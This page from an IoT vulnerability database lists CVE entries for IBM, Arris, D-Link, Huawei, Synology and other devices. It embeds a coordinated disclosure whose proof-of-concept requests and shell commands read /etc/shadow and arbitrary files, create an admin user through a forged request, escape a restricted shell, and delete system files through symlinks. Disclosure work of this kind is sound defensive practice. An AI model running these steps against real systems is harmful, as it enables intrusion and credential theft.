VARIoT IoT vulnerabilities database

IBM FlashSystem V840 and V900 products could allow an authenticated attacker with specialized access to overwrite arbitrary files which could cause a denial of service. IBM X-Force ID: 141148. IBM FlashSystem V840 and V900 The product contains vulnerabilities related to authorization, permissions, and access control. Vendors have confirmed this vulnerability IBM X-Force ID: 141148 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Both IBM FlashSystem V840 and V900 are all-flash enterprise-level storage solutions of IBM Corporation in the United States. The solution provides a full set of disaster recovery tools (including snapshot, clone and replication) to protect data security and use IBM Virtual Storage Center to realize virtualization configuration and performance management. Vulnerabilities in IBMs Flashsystems and Storwize Products ------------------------------------------------------------------------- Introduction ============ Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem 900 and IBM Storwize V7000. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that IBM Corporation undertakes a full whitebox security assessment of this application. The version under test was indicated as: 1.6.2.2 build 18 Affected Software And Versions ============================== - IBM Flashsystem 900 - IBM Flashsystem 840 - IBM Storwize V7000 Affected versions are indicated directly within the reported issues. CVE === The following CVEs were assigned to the issues described in this report: CVE-2018-1438 CVE-2018-1433 CVE-2018-1434 CVE-2018-1462 CVE-2018-1463 CVE-2018-1464 CVE-2018-1495 CVE-2018-1467 CVE-2018-1465 CVE-2018-1466 CVE-2018-1461 Vulnerability Overview ====================== 01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified allowing storage data access 02. CVE-2018-1433: Unauthenticated arbitrary file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified 03. CVE-2018-1434: Web interface vulnerable to CSRF 04. CVE-2018-1462: rBash ineffective as a security measure 05. CVE-2018-1463: World readable credentials and encryption keys 06. CVE-2018-1464: Sensitive file disclosure of files readable by root 07. CVE-2018-1495: Arbitrary file overwrite 08. CVE-2018-1467: Unauthenticated information disclosure 09. CVE-2018-1465: Unprivileged web server process may read SSL private key 10. CVE-2018-1466: Weak password hashing algorithm used 11. CVE-2018-1461: Missing Security Related HTTP Headers Vulnerability Details ===================== --------------------------------------------- CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified allowing storage data access --------------------------------------------- On the IBM V7000 Unified System the web handler /DLSnap does not require authentication and allows to read arbitrary files from the system as "root", including the data stored in the storage system from the mounted shares. GET /DLSnap?filename=/ibm/<redacted>/secret-file.txt HTTP/1.1 Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: Expires: Wed, 31 Dec 1969 16:00:00 PST X-Frame-Options: SAMEORIGIN Set-Cookie: SonasSessionID=<redacted>; Path=/; Secure; HttpOnly Content-disposition: attachment; filename=secret-file.txt Pragma: Content-Type: application/octet-stream Date: Tue, 16 Jan 2018 11:12:39 GMT Connection: close Content-Length: 4 42 -------------------------------------------------- CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler / Authenticated arbitrary file read via the DownloadFile Handler on v7000 Unified -------------------------------------------------- In case of the following list of products, the DownloadFile handler allows unauthenticated file reading under the "webadmin" user: IBM Flashsystem 900 IBM Flashsystem 840 IBM Storwize V7000 Example request: GET /DownloadFile?filename=/etc/passwd HTTP/1.1 Host: v7k01n02 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 On the V7000 Unified the same request handler allows reading arbitrary files under the "root" user, however authentication is required here: GET /DownloadFile?filename=/etc/shadow Host: v7ku01 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <redacted> ----------------------------------------------- CVE-2018-1434: Web interface vulnerable to CSRF ----------------------------------------------- The main web interface on the V7000 Unified is vulnerable to CSRF and other interfaces seem to be vulnerable as well. This could allow an external attacker to execute commands on behalf of a user/administrator of the system and potentially also access data stored on the system. Example request (using a cross domain XMLHttpRequest): POST /RPCAdapter HTTP/1.1 Host: v7ku01 Origin: https://www.example.com Referer: https://www.example.com/create_admin.html Content-Type: text/plain Connection: close Content-Length: 183 Cookie: <redacted> {"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","<redacted>",["Administrator"]]} Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-Frame-Options: SAMEORIGIN Content-Type: application/json;charset=UTF-8 Content-Length: 319 Connection: close {"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"<redacted>","name":"Create User", "state":"Running","status":"Task started.","progress":-1,"returnValue": null}} --------------------------------------------- CVE-2018-1462: Ineffective rBash Configuration --------------------------------------------- On machines with a restricted bash, a possible escape from rBash looks like the following: BASH_CMDS[escape]=/bin/bash;escape -------------------------------------------------- CVE-2018-1463: World readable credentials and encryption keys -------------------------------------------------- While some systems have removed the world-read bit from several files and directories, more important files which contain application configuration details, passwords and secret keys are world readable and sometimes also world writable. On the IBM Flash System, this also includes the storage encryption key. # Partial directory listing of /persist/ on the Unified system: drwxr-xr-x. 2 root root 4096 Jan 18 01:35 . drwxr-xr-x. 29 root root 4096 Aug 15 16:16 .. -rw-r--r--. 1 root root 27040 Jan 16 08:28 vpd ... # Partial directory listing of /mnt/plfs on the Flash system: drwxrwxrwx 4 root root 0 Dec 31 1969 . drwxr-x--x 7 root root 1024 Jan 8 07:41 .. -rw-rw-rw- 1 root root 24 Oct 24 2016 encryption.key ----------------------------------------------- CVE-2018-1464: Sensitive file disclosure of files readable by root ----------------------------------------------- The setuid binary svc_copy is a wrapper around the script sw_copy which calls cp on the shell. Creating a symlink to any file, this file can be copied as root to /dumps and is world readable/writable (-rw-rw-rw- ): $ ln -s /etc/shadow /tmp/shadow $ ./svc_copy /tmp/shadow /dumps/ The file /dumps/shadow is now world readable with the permissions (-rw-rw-rw- ) --------------------------------------------- CVE-2018-1495: Arbitrary file deletion --------------------------------------------- The setuid binary log_cleanup is a wrapper around log_cleanup.py This binary wipes the directories /dumps or /tmp and has an undocumented feature "-s" (delete target of symlink). The following command deletes an arbitrary file (e.g. /etc/shadow): $ ln -s /etc/shadow /tmp/shadow $ ./log_cleanup -s Select /tmp as target directory to be wiped -------------------------------------------------- CVE-2018-1467: Unauthenticated information disclosure -------------------------------------------------- Some web handlers on the V7000 Unified expose system configuration without authentication which could be used by an attacker to collect vital details about the environment. https://v7ku01/SonasInfoServlet?challenge=1 CLUSTER_ID=<redacted>;NAME=<redacted>.ibm;PROFILE=V7000 Unified;SYSTEM_NAME=<redacted>.ibm;mgmt001st001=<redacted>;mgmt002st001=<redacted>;idMapConfig=10000000-299999999,1000000;adHost<redacted>;krbMode=off;domain=<redacted>;idMapRole=master;realm=<redacted>;userName=<redacted>;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=<redacted>,S-1-5-21-<redacted>,auto;IDMAP_13000000-13999999=<redacted>,S-1-5-21-<redacted>,auto; CHALLENGE <redacted> ----------------------------------------------- CVE-2018-1465: Unprivileged web server process may read SSL private key ----------------------------------------------- The current private key for the installed SSL certificate on the V7000 FC CE Cannister Node is readable by the webadmin user: -rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key As a result the file can be read through vulnerabilities in the web application, e.g. via the DownloadFile handler (see separate issue). Certificate details: Validity: 15 years Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076, emailAddress=support@ibm.com --------------------------------------------- CVE-2018-1466: Weak password hashing algorithm used --------------------------------------------- The root password on the V7000 (CE) FC Cannister and Flash System nodes (and probably others, too) are hashed with a weak algorithm (DES) instead of the SHA512 which is the system's default according to /etc/login.defs. -------------------------------------------------- CVE-2018-1461: Missing Security Related HTTP Headers -------------------------------------------------- XSS Protection HTTP Header The XSS Filter is a feature that is built into modern web browsers and is meant to prevent reflective Cross Site Scripting attacks. This feature can be explicitly turned on (and also off) by using the HTTP header X-XSS-Protection. X-Content-Type Header To make MIME type confusion attacks harder, the HTTP header X-Content-Type-Options can be set. This header prevents trusting the user provided MIME type and instead guessing the MIME type of the server response. Author ====== The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and Jan Bee from the Google Security Team. Timeline ======== 2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day disclosure deadline (2018/04/26). 2018/01/29 - IBM acknowledges report and starts working on the issues. 2018/04/13 - IBM requested grace period due to internal patch cycle. 2018/04/16 - Google granted two week grace period (from 2018/04/26 to 2018/05/11). 2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List

On Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices, a logout action does not immediately destroy all state on the device related to the validity of the "credential" cookie, which might make it easier for attackers to obtain access at a later time (e.g., "at least for a few minutes"). NOTE: there is no documentation stating that the web UI's logout feature was supposed to do anything beyond removing the cookie from one instance of a web browser; a client-side logout action is often not intended to address cases where a person has made a copy of a cookie outside of a browser. Arris TG1682G Contains a session expiration vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ArrisTouchstoneTelephonyGatewayTG1682G is a Modem (Modem) router integrated machine from Arris Group of the United States. A security vulnerability exists in the ArrisTouchstoneTelephonyGatewayTG1682G9.1.103J6 release that caused the logout operation to fail to immediately clear all states on the device. An attacker could exploit the vulnerability to gain access. Hi, Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG) Series devices, related to its web administration console. The CVEs for these devices have been created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991. A blog post containing the full disclosure has been created: https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c Thank you. Regards Akshay 'Ax' Sharma

Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of "password" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user's guides distributed by ISPs state "At a minimum, you should set a login password.". Arris TG1682G Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ArrisTouchstoneTelephonyGatewayTG1682G is a Modem (Modem) router integrated machine from Arris Group of the United States. A security vulnerability exists in ArrisTouchstoneTelephonyGatewayTG1682G9.1.103J6, which is derived from the default password used by the admin account: password. There is a security vulnerability in Arris Touchstone Telephony Gateway TG1682G version 9.1.103J6. Hi, Multiple vulnerabilities exist in Arris Touchstone Telephony Gateway (TG) Series devices, related to its web administration console. The CVEs for these devices have been created: CVE-2018-10989, CVE-2018-10990, CVE-2018-10991. A blog post containing the full disclosure has been created: https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c Thank you. Regards Akshay 'Ax' Sharma

Ruijie Networks NBR1300G-E is a new generation gateway product. Ruijie Networks RG-EG2000CE-1T is an SSL VPN device. A remote command injection vulnerability exists in Ruijie Networks NBR1300G-E & RG-EG2000CE-1T. Attackers can send malicious code to achieve remote command injection before login.

Parameter corruption in NDIS filter driver in Intel Online Connect Access 1.9.22.0 allows an attacker to cause a denial of service via local access. A local attacker can exploit this issue to crash the operating system, denying service to legitimate users. This program is used to protect identity information, login information, etc. NDIS filter driver is one of the NDIS (Network Driver Interface Specification, Network Driver Interface Specification) filter drivers

Stack-based buffer overflow in the websRedirect function in GoAhead on D-Link DIR-816 A2 (CN) routers with firmware version 1.10B05 allows unauthenticated remote attackers to execute arbitrary code via a request with a long HTTP Host header. D-Link DIR-816 A2 (CN) The router firmware contains a buffer error vulnerability.Refer to the vendor information and reference information and take appropriate measures. D-LinkDIR-816A2 is a wireless router product of D-Link. GoAhead is one of the embedded web servers. A stack buffer overflow vulnerability exists in GoAhead's 'websRedirect' function in D-LinkDIR-816A2 (CN) using firmware version 1.10B05

The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable. D-Link DIR-629-B1 Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-629-B1 is a router device of D-Link. A security vulnerability exists in the /htdocs/cgibin \342\200\230weblogin_log\342\200\231 function in D-LinkDIR-629-B1. D-Link DIR-629-B1 is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffer. Attackers may leverage this issue to execute arbitrary code in the context of the affected device. Failed exploits may result in denial-of-service conditions

Fastweb FASTgate 0.00.47 devices are vulnerable to CSRF, with impacts including Wi-Fi password changing, Guest Wi-Fi activating, etc. Fastweb FASTgate Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Fastweb FASTgate is a router device produced by Italian Fastweb company. A cross-site request forgery vulnerability exists in Fastweb FASTgate version 0.00.47. Remote attackers can exploit this vulnerability to change configurations, such as changing Wi-Fi passwords

DLL injection vulnerability in the installation executables (Autorun.exe and Setup.exe) for Intel's wireless drivers and related software in Intel Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC family of products allows a local attacker to cause escalation of privilege via remote code execution. plural Intel Wireless-AC The product contains an injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. IntelDualBandWireless-AC, Tri-BandWireless-AC and Wireless-AC are all wireless network card products of Intel Corporation of the United States. Intelwirelessdrivers is one of the wireless network card drivers. Autorun.exe is one of the executable files; Setup.exe is one of the installation files. There are security vulnerabilities in the Autorun.exe and Setup.exe files for the Intelwireless drivers and related software in IntelDualBandWireless-AC, Tri-BandWireless-AC and Wireless-AC. A local attacker can exploit this vulnerability to increase privileges through remote code execution

Huawei smart phones Mate 10 and Mate 10 Pro with earlier versions than 8.0.0.129(SP2C00) and earlier versions than 8.0.0.129(SP2C01) have an authentication bypass vulnerability. An attacker with high privilege obtains the smart phone and bypass the activation function by some specific operations. Huawei smartphone Mate 10 and Mate 10 Pro Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state

Huawei home gateway products HiRouter-CD20 and WS5200 with the versions before HiRouter-CD20-10 1.9.6 and the versions before WS5200-10 1.9.6 have a path traversal vulnerability. Due to the lack of validation while these home gateway products install APK plugins, an attacker tricks a user into installing a malicious APK plugin, and plugin can overwrite arbitrary file of devices. Successful exploit may result in arbitrary code execution or privilege escalation. Huawei HiRouter-CD20 and WS5200 are both home router products released by Huawei. The vulnerability stems from insufficient validation when the APK plugin is installed

Rockwell Automation Arena versions 15.10.00 and prior contains a use after free vulnerability caused by processing specially crafted Arena Simulation Software files that may cause the software application to crash, potentially losing any unsaved data.. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of an Arena Model file. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the Arena process. Rockwell Automation Arena is a suite of discrete event simulation and automation software from Rockwell Automation. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service conditions. Versions prior to Arena 15.10.01 are vulnerable

Honeywell MatrikonOPC OPC Controller before 5.1.0.0 allows local users to transfer arbitrary files from a host computer and consequently obtain sensitive information via vectors related to MSXML libraries. Honeywell MatrikonOPC OPC Controller Contains an information disclosure vulnerability.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. MatrikonOPC Explorer is a free tool for viewing data items contained in OPC servers and detecting OPC network communications. A file transfer vulnerability exists in MatrikonOPC Explorer that allows an attacker to transfer unauthorized files from the host system. MatrikonOPC Explorer is prone to local security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks

Huawei iBMC V200R002C60 have an authentication bypass vulnerability. A remote attacker with low privilege may craft specific messages to upload authentication certificate to the affected products. Due to improper validation of the upload authority, successful exploit may cause privilege elevation. plural Huawei The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei iBMC is a server embedded intelligent management system developed by China Huawei (Huawei). The system has the functions of remote operation and maintenance, fault diagnosis, intelligent management and standardized interface management. The vulnerability is due to the fact that the program does not verify the correct upload permission

Cross Site Scripting (XSS) exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15 via the configuration of a user account. An attacker can execute arbitrary script on an unsuspecting user's browser. Foxconn FEMTO AP-FC4064-T Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Foxconn FEMTO AP-FC4064-T is a home base station equipment manufactured by Foxconn

A low privileged admin account with a weak default password of admin exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15. In addition, its web management page relies on the existence or values of cookies when performing security-critical operations. One can gain privileges by modifying cookies. Foxconn FEMTO AP-FC4064-T Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Foxconn FEMTO AP-FC4064-T is a home base station equipment manufactured by Foxconn. There is a security vulnerability in the web management page of Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15

CSRF exists on D-Link DIR-868L devices, leading to (for example) a change to the Admin password. hedwig.cgi and pigwidgeon.cgi are two of the affected components. D-Link DIR-868L The device contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-868L is a wireless router product of D-Link. A cross-site request forgery vulnerability exists in the hedwig.cgi and pigwidgeon.cgi files in D-LinkDIR-868L

Cross-site scripting (XSS) vulnerability in Notification Center in Synology Calendar before 2.1.1-0502 allows remote authenticated users to inject arbitrary web script or HTML via title parameter. Synology Calendar Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Calendar is a file protection program from Synology that runs on Synology NAS devices. Notification Center is one of the system notification components

SQL injection vulnerability in UPnP DMA in Synology Media Server before 1.7.6-2842 and before 1.4-2654 allows remote attackers to execute arbitrary SQL commands via the ObjectID parameter. Synology Media Server is a set of media server software from Synology

Cross-site scripting (XSS) vulnerability in Attachment Preview in Synology Drive before 1.0.1-10253 allows remote authenticated users to inject arbitrary web script or HTML via malicious attachments. Synology Drive Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Synology Drive is a collaborative office suite from Synology, which includes the functions of document management, collaborative office and file synchronization backup. Attachment Preview is one of the attachment preview plugins